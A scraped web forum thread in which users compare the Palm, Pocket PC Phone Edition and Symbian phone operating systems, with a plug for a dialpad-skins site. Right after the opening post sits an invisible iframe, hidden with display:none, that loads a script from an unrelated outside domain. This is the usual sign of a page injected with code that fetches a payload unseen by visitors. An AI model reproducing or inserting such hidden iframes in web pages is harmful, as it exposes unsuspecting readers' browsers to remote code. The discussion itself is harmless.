+ Reply to Thread
    (Click a sponser today!)

Which OS? Palm? Symbian? Pocket PC?

Aside from having to determine the form factor, (to clam or not to clam), carrier (I hate Sprint - I love Sprint), input method (keypad, graffiti, mental telepathy), we also have to figure out which operating system we want in our next phone!

Palm = Great support, lots of inexpensive software, stable.

Pocket PC Phone edition = Same as above except from Microsoft (for what that's worth).

Symbian = New, limited 3rd party support?, SDK IS available.

Start discussing, boys and girls!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Gary

You forgot to mention:

Palm =good if you are looking for an Organizer, not very powerful, but stable, no peak of the technology

Pocket PC Phone edition = Beautiful colors, yeah, since is Micro$oft, (is good, and bad), but well sync and blend with Windows Systems, more power, top of the line, and excellent graphics. Bigger machines, (maybe), SDK available and software are popping out left and right. also, 98% of software is compatible with this machine, unlike the Sam I300 and Kyo 6035, where there where a 70% of software compatible with them

Symbian = not really new, is been around since the PSION, the OS instead of Symbian it used to be named EPOC32, but anyways, the system has SDK, but nobody really uses it, but NOKIA (owners) and now Sony/Ericsson, we will have to see how the P800 evolves and how much software is developed for them.
    visit http://www.yorch.net your place for Pocket Pc Phone Edition Dialpad Skins!

(Click a sponser today!)
    Yorch, I didn't forget to mention really, You've answered in EXACTLY the way I was hoping for. That is, more info from those who have been exposed to these OS's.
    Great reply, thanks!

More, kids?
    Gary